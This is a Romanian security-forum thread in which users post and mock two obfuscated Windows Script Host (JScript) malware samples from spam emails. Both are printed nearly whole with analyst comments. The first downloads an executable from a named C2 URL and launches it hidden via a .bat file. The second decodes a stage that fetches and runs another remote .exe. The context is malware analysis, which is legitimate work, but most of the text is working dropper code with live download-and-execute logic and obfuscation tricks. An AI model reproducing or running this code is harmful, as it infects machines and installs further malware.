Nytro Posted May 12, 2016 Report Posted May 12, 2016 Salut, Am mai primit un email cu un JS intr-un ZIP. E stupid, incepe cu comentarii, are pe la mijloc codul si se termina cu comentarii. In fine, JS-ul e urmatorul:
/*
 * MALWARE SAMPLE - Windows Script Host (JScript) downloader/dropper.
 * Reformatted and annotated for analysis only; the code itself is unchanged.
 * Do not execute outside an isolated sandbox.
 *
 * What the code does (every step is visible below):
 *   1. Arms itself only when JScript conditional compilation reports
 *      @_win32 / @_win64 (Microsoft's engine on Windows); otherwise it prints
 *      "pizzzzda" and exits with code 1.
 *   2. Assembles every API name and IOC from fragments / reversed strings so
 *      nothing is greppable: "CreateObject", "ResponseBody", "position",
 *      "SaveToFile", "ADODB", "send", "GET", "MSXML2.XMLHTTP", "WScript.Shell",
 *      "Run" and the URL http://scrubs.dresscool.co/zcv3hhs.
 *   3. Synchronous HTTP GET of that URL through MSXML2.XMLHTTP.
 *   4. Writes %TEMP%/suc11.05.2016kit.bat ("start <exe>\r\nexit"), writes the
 *      response body to %TEMP%/qSj87b4UV.exe via ADODB.Stream, then runs the
 *      .bat with WScript.Shell.Run(bat, 0, 0).
 *   5. Everything inside the loop is wrapped in try/catch with an empty catch,
 *      and the loop only terminates after the download completed, so a failing
 *      request is retried indefinitely with a 120 ms sleep per iteration.
 * The many "QU5zoJYpASu6" block comments are obfuscator filler.
 */
var WARRANTIES0 = false; // "armed" flag; only the @if block below can set it
var mousemove0 = "";     // becomes "MLH", the middle of "MSXML2.XMLHTTP"
var code;                // becomes "ResponseBody"
var delts = "C" + "r"+"e"+"ateObject"; // "CreateObject"
// Conditional compilation: only Microsoft JScript (cscript/wscript) executes
// the block below, and @_win32/@_win64 restrict it to Windows builds. Note the
// filler comment right after "/*@cc_on": JScript treats it as an ordinary
// comment inside the conditional block, but for any other engine its "*/"
// closes the comment opened by "/*@cc_on" and the following "@if" is a syntax
// error - the file does not even parse outside WSH (engine fingerprinting by
// construction, whether intended or not).
/*@cc_on /* QU5zoJYpASu6 */ @if (@_win32 || @_win64)/* QU5zoJYpASu6 */ // (a line break after this "//" was lost in the forum paste; the arming statement must start on the next line or nothing below would run)
WARRANTIES0 /* QU5zoJYpASu6 */= true;/* QU5zoJYpASu6 */
mousemove0/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */"MLH";/* QU5zoJYpASu6 */
code =/* QU5zoJYpASu6 */ "R" + "esponseB"/* QU5zoJYpASu6 */ + "ydo".split('').reverse().join(''); // "ResponseBody"
objref = /* QU5zoJYpASu6 */(/* QU5zoJYpASu6 */"noitisop").split(''/* QU5zoJYpASu6 */).reverse(/* QU5zoJYpASu6 */).join(''); // "position"
directionally0/* QU5zoJYpASu6 */ =/* QU5zoJYpASu6 */ "eliFoTevaS".split(''/* QU5zoJYpASu6 */).reverse().join(''); // "SaveToFile"
B12F40 = "A"+"DODB"; // "ADODB"
mousemove1 = "s" + "end"; // "send"
dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; // IOC: http://scrubs.dresscool.co/zcv3hhs
dishy0 /* QU5zoJYpASu6 */ = "G\x45"+"T"; // "GET"
/* QU5zoJYpASu6 */ @end/* QU5zoJYpASu6 */ @*//* QU5zoJYpASu6 */
// Not armed (non-Windows JScript build): print a marker and exit 1.
if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); }
var Summary/* QU5zoJYpASu6 */ = /* QU5zoJYpASu6 */this[/* QU5zoJYpASu6 */"WScript"/* QU5zoJYpASu6 */]/* QU5zoJYpASu6 */; // the WScript host object, looked up through the global object
// delts0 = WScript.CreateObject("WScript.Shell"); the comma expression
// ("Trafdscks", "WScript") evaluates to "WScript". delay0 (11) is never used.
var delts0 = function mousemove() {return Summary[delts](("Trafdscks", "WScript")+".Shell");}(), delay0 = 4 * 2 + 3;
var Amount0 = 1 * (2 - 0);                     // 2
var countRemain = Amount0 - ((1 * 2) + 0) * 1; // 0: reused as the "done" loop state and as both numeric arguments to Run()
// directionally(path) = WshShell.Run(path, 0, 0) - per WshShell.Run that is
// intWindowStyle 0 (hidden window) and bWaitOnReturn false. The key is built
// from comma expressions: ("...", "R") + "u" + ("...", "n") = "Run".
function directionally(Summary0){delts0[("Ifasd ", "Gef.H.", "R")+ "u" + ("fudfk", "n")](Summary0, countRemain, countRemain);};
function cir(){return delts;}; // returns "CreateObject"
{
var code0 = "M" + "SX"+"ML2."+"X"+mousemove0+"T"+"TP"; // "MSXML2.XMLHTTP"
var delay = ""; delay = "o"+"pen"; // "open"
// penetration(stream) = stream.SaveToFile(%TEMP%/qSj87b4UV.exe, 2); the
// arithmetic yields 2 (ADODB adSaveCreateOverWrite). Always returns 0.
function penetration(FFFFF00) {FFFFF00[directionally0](delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e", (-9815 + 9817) * 1); return 0;};
if (true){
penetration1 = code0;
cos1 = Summary[delts](penetration1); // cos1 = WScript.CreateObject("MSXML2.XMLHTTP")
var WARRANTIES = 3-2; // download state: 1 = not yet sent, 2 = sent, 0 = done
do { for (;WARRANTIES;){ try {
if (WARRANTIES == 1) {
cos1[delay](dishy0 /* QU5zoJYpASu6 */, dishy, (true, false)); // open("GET", url, false): async=false, so the readyState poll below is effectively moot
cos1[mousemove1](); // send()
cos0 = "S"+"l"+"eep";
WARRANTIES = 2;
}
Summary[cos0](120); // WScript.Sleep(120)
if (cos1["r"+"eadystate"] < 2 * 2) continue; // readyState < 4 (lowercase property name; presumably relies on COM's case-insensitive name lookup)
WARRANTIES = countRemain; // 0: this is the last pass through both loops
function cos(B12F4) {var penetration0 = (123, B12F4); return penetration0;}; // identity function, never called
FFFFF0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "qSj87b4UV.ex" + "e";   // %TEMP%/qSj87b4UV.exe
countRemain0 = delts0["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "suc11.05.2016kit.bat"; // %TEMP%/suc11.05.2016kit.bat
objref0 = "start "+FFFFF0+"\r\nexit" // contents of the launcher .bat (no ";": the original presumably had a line break here that the paste collapsed)
// 1) Text ADODB.Stream (type 2, charset windows-1251): WriteText the .bat, position = 0, SaveToFile(bat, 2).
penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m");
penetration1[delay](); // open()
penetration1["t"+"y"+"pe"] = 2;
Amount /* QU5zoJYpASu6 */ = "w"+"r"+"i"+"t"+"e"; // "write"
penetration1["Charset"] = "windows-1251";
penetration1[Amount+"Text"](objref0); // WriteText(...)
directionally1[objref] = 1 * 0; // position = 0
penetration1[directionally0](countRemain0, 2 * 1); // SaveToFile(bat, 2)
directionally1["c"+"l"+"o"+"s"+"e"]();
// 2) Text stream again: writes the single character "M" to the .exe path.
//    Step 3 overwrites it; the purpose is not evident from the code.
penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m");
penetration1[delay]();
penetration1["t"+"y"+"pe"] = 2;
penetration1["Charset"] = "windows-1251";
penetration1[Amount+"Text"]("M");
directionally1[objref] = 0;
penetration(penetration1);
directionally1["c"+"l"+"o"+"s"+"e"]();
// 3) Binary stream (type 1): write(ResponseBody), position = 1 (not 0), SaveToFile(exe, 2).
//    NOTE(review): position 1 suggests the server prepends one junk byte to the
//    payload and SaveToFile is expected to start at the current position -
//    confirm against ADODB.Stream semantics before relying on that reading.
penetration1 = directionally1 = Summary[cir()](B12F40+"."+"Str"+"e"+"a"+"m");
penetration1[delay]();
penetration1["t"+"y"+"pe"] = 1 * 1;
penetration1[Amount](cos1[code]); // write(cos1.ResponseBody)
directionally1[objref] = 1;
penetration(penetration1);
directionally1["c"+"l"+"o"+"s"+"e"]();
if (1 && WARRANTIES0) directionally(countRemain0); // run the .bat hidden; it starts the dropped .exe
} catch(cir0){}; // every failure (network, COM, file) is swallowed and the loop simply iterates again
}; }while (WARRANTIES);
} }
E "obfuscat" cu pula dishy = "ht"+"tp:"+"//s"+"cr"+"ubs"+".dr"+"es"+"sco"+"ol."+"co"+"/z"+"cv"+"3h"+"hs"; Ma intreb ce nationalitate o avea autorul: if (!(WARRANTIES0)) { WScript.Echo("pizzzzda"); WScript.Quit(1); } Haideti baietii, puteti mai mult! 2
Speed123 Posted May 12, 2016 Voiau sa te infecteze, Nytro. Arde-i! Poate au aflat si indienii de pizda
yo20063 Posted May 12, 2016 Sufera tare cine l-a scris. Parerea mea e ca putea face ceva mult mai destept, mult mai usor, fara atat de mult "+str()"...
malsploit Posted May 16, 2016 Am vreo 20 de adrese de email pe care le tin ca spam-trap si a fost o perioada, pe la inceputul anului, in care le primeam zilnic. Faceau spread pentru un locker.
nein Posted May 17, 2016 Report Posted May 17, 2016 Spoiler
/*
 * MALWARE SAMPLE #2 - Windows Script Host (JScript) two-stage dropper.
 * Reformatted and annotated for analysis only; the code itself is unchanged.
 * Do not execute outside an isolated sandbox.
 *
 * Stage 1 (this file): the string variables below are URL-encoded fragments
 * of a second JScript. ugly$() concatenates them in the order given in the
 * unescape() call, writes the result to %TEMP%/saveToFile.js via
 * Scripting.FileSystemObject, runs it with WScript.Shell.Run, sleeps 12 s and
 * then runs %TEMP%/S5G64114Gt.exe.
 *
 * Stage 2 (decoded from the fragments; it hides every API name with the same
 * "X".replace(/X/, "Y") trick used here): creates Msxml2.XMLHTTP.6.0, does a
 * synchronous GET of http://gbi-stroi.u7m.ru/img/.../log.php?f=403, sleeps
 * 8193 ms, writes the ResponseBody into a binary ADODB.Stream (type 1,
 * position 0) and calls stream[WScript.ScriptName.split(".")[0]](
 * %temp%/S5G64114Gt.exe, 2) - i.e. the dropper's own file name "saveToFile"
 * doubles as the ADODB SaveToFile method name (COM name lookup is
 * case-insensitive). The "f=403" value and the ".../" path element are
 * literal in the fragments.
 *
 * Anti-analysis: both stages reach their real code through `this = "..."`
 * assignments inside try/catch. Microsoft JScript throws at run time, so the
 * catch block runs; modern engines reject the assignment at parse time, so the
 * script never executes at all outside WSH.
 *
 * Fragments that carry IOCs: yi + resp (C2 URL), io (the "403" query value),
 * high + e193 + gee (Msxml2.XMLHTTP.6.0), e052 + EREG + A1B1 and the last
 * replace() in ugly$ (/S5G64114Gt.exe).
 */
_ = 38417, vim = "B%0A%09%09ante%20%3D%20Knox%3B%0A%09", Find = "del";
e080 = "DELE";
pasv = "0%5Cx6cac%5Cx65%22%5D%28/GPL2/%2C%20%22%5Cx", Aviv = "_z";
ins = "_hsl", EREG = "x35%5Cx47%5Cx36%5Cx341%5Cx314%5Cx47%5Cx74", dot = "More", WIN = "Day", e052 = "2.replace%28/hi/%2C%20%22/%5Cx53%5C"; // e052 + EREG decode to: ".replace(/hi/, "/S5G64114Gt"
var mark = "walk", e089 = "End";
Bump = "5Cx64%22%5B%22%5Cx72%5Cx65p%5Cx6c%5Cx61%5C";
var kses = "pop", amet = "ce%28/IF/%2C%20%22%5Cx53%5Cx63%5Cx7", b3db = 2, Cop = "var%20Knox%20%3D%20%22Nav%22%2C%20_%20%3"; // Cop is the first fragment: 'var Knox = "Nav", _ ='
Old = "A%09zx%24vf%28%29%3B%0Atry%20%7B%0A%09%09Kn";
var ow = "D%2041245%3B%0Avar%20co%20%3D%20%22_dir%22%3B", yi = "%0Awild%20%3D%20%22http%3A//gbi-stroi.u7m"; // yi: 'wild = "http://gbi-stroi.u7m'
Link = "te.position%20%3D%200%3B%0A%7D%0A%09w%24g";
resp = ".ru/img/.../log.php%3Ff%3D%22%2C%0A", XFN = "e030%20%3D%20%22isn%22%3B%20ante%20%3D%20%22"; // resp: '.ru/img/.../log.php?f=",' -> IOC http://gbi-stroi.u7m.ru/img/.../log.php?f=
e192 = "s%5D%3B%0A%7D%0A%09au%24th%28%29%3B%0A";
f161 = "runs%22%3B%20var%20omit%20%3D%20%22", Cras = "ccc%22%3B%20var%20TYPE%20%3D%20%22dc%";
var but = "5B%22%5Cx72epl%5Cx61%5Cx63%5Cx65%22%5D%28/";
know = "22%2C%20thus%20%3D%200%2C%0Af335%20%", w3 = "8Motu%29%20%7B%0A%09%09%22C%5Cx52O%5Cx4e%22%", io = "3D%20%22ico%22%3B%20raw%20%3D%20%22403%2", IXR = "2%2C%0Aog%20%3D%20%22fed%22%2C%0AOrd%20%3D"; // io: 'raw = "403' - appended to the URL as the f= value
tied = "Cx6f%5Cx64%5Cx79%22%29%5D%29%3B%0A%09%09an";
w2 = "%20%22_nx%22%2C%0APast%20%3D%201%3B%0Avar%2", gift = "0UA%20%3D%20%22tel%22%3B%0Avar%20St%20", Rica = "29%3B%09Z_%20%3D%20co%20%3D%20Knox%3B%0Afun";
var mind = "%3D%20%22rtl%22%2C%0AZ_%20%3D%20%22rec";
neat = "t%22%2C%20vi%20%3D%20%22weak%22%3B%20va";
SET = "5Cx66%5Cx61ke%22%3B%0A%7D%20catch%20%28p%29";
var held = "r%20e178%20%3D%20%22su%22%3B%20var%20", ho = "Rome%20%3D%202%2C%0Af30%20%3D%20%22Out%22", Send = "Set";
GB = "%3B%0A%0Ae030%20%3D%20omit%20%3D%20f335%20";
pi = "Cx2eStrea%5Cx6d%22%29%29%3B%0A%7D%0A%3B%0";
var apps = "%3D%20this%3B%0Afunction%20f100%28%29%0A";
am = "%7B%0A%09Ord%20%3D%20e030%5B%22P%5Cx61%5Cx";
f227 = "3B%0A%7D%0A%09Knox.type%20%3D%20%20%2B%2";
Give = "6c%5Cx69%22.replace%28/Pali/%2C%20%22%5Cx57%5", dd = "Cx53%5Cx63r%5Cx69p%5Cx74%22%29%5D%3B%0A%7D%0", a74 = "x63%5Cx65%22%5D%28/gid/%2C%20%22%5Cx52%5Cx";
gp = "Af100%28%29%3B%0AUA%20%3D%20Ord%5B%22%5Cx4f", some = "%5Cx72%5Cx61l%22%5B%22r%5Cx65%5Cx70%5Cx6c%5C", usr = "ment%28%22%5Cx47%5Cx50L%5Cx32%22%5B%22re%5Cx7";
How = "x61%5Cx63%5Cx65%22%5D%28/Oral/%2C%20", e126 = "%22%5Cx43r%5Cx65%5Cx61t%5Cx65%5Cx4fb", Test = "ction%20au%24th%28%29%0A%7B%0A%09%09";
amp = "%5Cx6a%5Cx65%5Cx63%5Cx74%22%29%5D%28%22%5";
var ereg = "%5D.split%28%22%5Cx2e%22%29%5B%20%2B%20thu";
var sbug = "Cx48%5Cx6fok%22.replace%28/Hook/%2C%20", HTTP = "%22%5Cx57%5Cx53%5Cx63r%5Cx69%5Cx70%5Cx", peek = "%20%7B%0A%09%09Z_%5Be178%5D%28St%28%22%5", tube = "74.%5Cx53%5Cx68%5Cx65ll%22%29%29%3B%", tech = "0Avi%20%3D%20omit%5B%22%5Cx661%5Cx35%", Yi = "%29%3B%0A%7D%0A%7D%0A%0A";
var cell = "5Cx39%22%5B%22%5Cx72epl%5Cx61%5Cx63%5Cx65%22%", tmp = "5D%28/f159/%2C%20%22%5Cx41ct%5Cx69%5Cx76%5Cx6";
iso = "SVG/%2C%20%22AD%5Cx4f%5Cx44%5Cx42%5"; // "ADODB" + pi ".Stream"
tan = "5X%5Cx4f%5Cx62%5Cx6a%5Cx65%5Cx63t%22%29%5D%3"; // end of "ActiveXObject"
var mit = "B%0Atry%20%7B%0A%09f335%20%3D%20e030%3B%0A%0";
var e96 = "ox.open%28%29%3B%0A%7D%20catch%20%2", AYS = "9f30%20%3D%20TYPE.BrowseForFolder%280%2C%20"; // AYS: TYPE is the string "dc" in stage 2, so this call throws and control enters the catch (Connection) block that does the download
fb8 = "%22%5Cx66%5Cx31%5Cx35%5Cx37%22%5B%22%5Cx72e", RNTO = "0Past%3B%0Afunction%20w%24get%28%29%0A%7", soon = "%5Cx70l%5Cx61ce%22%5D%28/f157/%2C%2";
UCT = "%09ante.write%28og%5B%22%5Cx67%5Cx69%";
var blue = "0%22%5Cx53%5Cx65l%5Cx65%5Cx63%5Cx74Fol";
var Url = "de%5Cx72%22%29%2C%20%20%2B%20thus%29%3B%0A";
var f228 = "65%5Cx73%5Cx70o%5Cx6e%5Cx73%5Cx65%5Cx42%5", To = "%7D%20catch%20%28Connection%29%20%7B%0A";
e136 = "function%20Long%28%29%0A%7B%0A%09%09f30%", bars = "et%28%29%3B%0ASt%20%3D%20UA.Environ", Afar = "20%3D%20wild%20%2B%20raw%3B%0A%7D%0A%09Long%", htm = "28%29%3B%0Atry%20%7B%0A%09%09this%20", Data = "50ro%5Cx63%5Cx65%5Cx73%5Cx73%22%29%", alt = "%3D%20%22%5Cx76i%5Cx6d%22%3B%0A%7D%20ca", Long = "tch%20%28conf%29%20%7B%0A%09%09og%20%3D%", pro = "e178%20%3D%20Ord%5B%22%5Cx49F%22.repla", msn = "20new%20vi%28%22%5Cx4d%5Cx4d%22%5B%22%5Cx72%5"; // Afar: f30 = wild + raw (the full C2 URL)
conf = "2%5Cx69%5Cx70%5Cx74%5Cx4ea%5Cx6d%5Cx65%22%29"; // pro + amet + conf: Ord["IF".replace(/IF/, "ScriptName")] -> WScript.ScriptName
e078 = "Cx65%5Cx70%5Cx6c%5Cx61%5Cx63e%22%5D%28/MM/%2C", high = "%20%22%5Cx4d%5Cx73%5Cx78%5Cx6dl%5Cx32%5Cx2eX";
var File = "try%20%7B%0A%09%09this%20%3D%20%22%";
e193 = "%5Cx4d%5Cx4c%5Cx48%5Cx54%5Cx54P%5Cx2e6%5Cx2", gee = "e%5Cx30%22%29%29%3B%0A%09%09og.open%2"; // high + e193 + gee: "Msxml2.XMLHTTP.6.0"
var sin = "Cx74em%5Cx70%22%29%20%2B%20%22%5Cx68i%2", ba = "8%22%5Cx47ET%22%2C%20f30%2C%200%29%3B%0A%", fat = "7D%0A%09og.send%28%29%3B%0A%09Ord.S"; // ba: og.open("GET", f30, 0) - synchronous
var A1B1 = "%5Cx2e%5Cx65x%5Cx65%22%29%2C%20%20%2B%20Rome"; // ".exe"), +Rome  (Rome = 2 -> adSaveCreateOverWrite)
Redo = "leep%288193%29%3B%0A%09zx%24vf%20%3D", back = "%20function%28%29%0A%7B%0A%09Knox%20%"; // Redo: WScript.Sleep(8193)
Load = "3D%20new%20vi%28%22%5Cx53V%5Cx47%22%";
Find = e080 = Aviv = this; // the global object
ins = this["I\x74"["\x72ep\x6c\x61c\x65"](/It/, "\x57\x53\x63\x72\x69\x70\x74")]; // "It".replace(/It/, "WScript") -> ins = WScript
// fi$le(): dot = WScript.CreateObject("WScript.Shell");
//          WIN = new ActiveXObject("Scripting.FileSystemObject");
//          mark = WshShell.Environment("Process")  (so mark("temp") reads %TEMP%)
function fi$le() { dot = ins.CreateObject("\x6ctr".replace(/ltr/, "\x57S\x63\x72\x69pt\x2e\x53\x68ell")); WIN = new Find.ActiveXObject("\x651\x310"["\x72\x65\x70\x6c\x61c\x65"](/e110/, "S\x63r\x69\x70t\x69\x6eg.\x46\x69\x6ce\x53\x79\x73t\x65\x6d\x4f\x62j\x65ct")); mark = dot.Environment("\x76e".replace(/ve/, "P\x72\x6f\x63\x65\x73\x73")); }
fi$le();
// The assignment to `this` is meant to throw so that the catch runs:
// e089 = %temp% + "/saveToFile.js". On engines where `this = ...` is a parse
// error the script never starts (see header).
try { this = "\x49\x63o\x6e"; } catch (U) { e089 = mark("\x74e\x6dp") + "fa\x69r"["r\x65p\x6c\x61ce"](/fair/, "/\x73\x61\x76\x65\x54oF\x69\x6c\x65\x2e\x6a\x73"); }
kses = WIN.OpenTextFile(e089, + b3db, true, 0); // FSO OpenTextFile(path, 2 = ForWriting, create = true, 0 = ASCII)
// ugly$(): decode and write stage 2, run it, wait 12 s, then run the .exe it
// is expected to have dropped. The order of the + chain is the decode order.
ugly$ = function() { kses.write(unescape(Cop + ow + yi + resp + XFN + f161 + Cras + know + io + IXR + w2 + gift + mind + neat + held + ho + GB + apps + am + Give + dd + gp + some + How + e126 + amp + sbug + HTTP + tube + tech + cell + tmp + tan + mit + AYS + fb8 + soon + blue + Url + To + e136 + Afar + htm + alt + Long + msn + e078 + high + e193 + gee + ba + fat + Redo + back + Load + but + iso + pi + Old + e96 + w3 + f227 + RNTO + vim + UCT + Bump + a74 + f228 + tied + Link + bars + usr + pasv + Data + Rica + Test + pro + amet + conf + ereg + e192 + File + SET + peek + sin + e052 + EREG + A1B1 + Yi)); kses.close(); dot.Run(e089); ins.Sleep(12000); Send = mark("\x74\x65\x6dp") + "\x6c".replace(/l/, "\x2f\x53\x35G\x36\x34\x31\x314\x47\x74.\x65\x78\x65"); dot.Run(Send); } ; // dot.Run(e089) executes %TEMP%/saveToFile.js; Send decodes to %temp%/S5G64114Gt.exe and is run with Run's defaults (visible window, no wait)
ugly$();
aiureaaaaaaa ! si eu am primit